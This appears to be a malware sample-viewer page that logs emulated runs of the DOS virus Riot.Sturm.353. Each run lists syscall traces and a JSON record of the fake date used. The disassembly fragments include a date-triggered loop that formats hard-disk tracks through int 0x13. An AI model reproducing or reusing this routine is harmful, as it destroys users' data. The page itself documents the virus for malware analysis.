Sample viewer

vx.netlux.org/Virus.DOS.Riot.Sturm.353

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:09.53290541Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2
0x12a84: je 0x12a94
0x12a86: mov ah, 0x2a
0x12a88: int 0x21
0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
2018-12-17T22:24:09.54465266Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
0x12ab0: push word ptr cs:[bp + 0x159]
0x12ab5: push ds
0x12ab6: push cs
0x12ab7: pop ds
2018-12-17T22:24:09.54832525Z 26 PC: 12ac0 | Set disk transfer address
2018-12-17T22:24:09.549543313Z 25 PC: 12ac4 | Get default drive
2018-12-17T22:24:09.551191357Z 26 PC: 12b7d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4244,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.681007394Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2
0x12a84: je 0x12a94
0x12a86: mov ah, 0x2a
0x12a88: int 0x21
0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
2018-12-25T11:51:21.683950209Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
0x12ab0: push word ptr cs:[bp + 0x159]
0x12ab5: push ds
0x12ab6: push cs
0x12ab7: pop ds
2018-12-25T11:51:21.686463321Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:51:21.687692189Z 25 PC: 12ac4 | Get default drive
2018-12-25T11:51:21.689227983Z 26 PC: 12b7d | Set disk transfer address

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4244,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:21.808209808Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2
0x12a84: je 0x12a94
0x12a86: mov ah, 0x2a
0x12a88: int 0x21
0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
2018-12-25T11:51:21.811376652Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2
0x12a8d: je 0x12a94
0x12a8f: cmp cl, 0x3b
0x12a92: jne 0x12aa5
0x12a94: xor ch, ch
0x12a96: mov ah, 5
0x12a98: xor dh, dh
0x12a9a: mov dl, 0x80
0x12a9c: int 0x13
0x12a9e: inc ch
0x12aa0: cmp dh, 0xff
0x12aa3: loopne 0x12a96
0x12aa5: mov ax, es
0x12aa7: add ax, 0x10
0x12aaa: add ax, word ptr cs:[bp + 0x15b]
0x12aaf: push ax
0x12ab0: push word ptr cs:[bp + 0x159]
0x12ab5: push ds
0x12ab6: push cs
0x12ab7: pop ds
2018-12-25T11:51:23.65813307Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:51:23.659044364Z 25 PC: 12ac4 | Get default drive
2018-12-25T11:51:23.660121377Z 26 PC: 12b7d | Set disk transfer address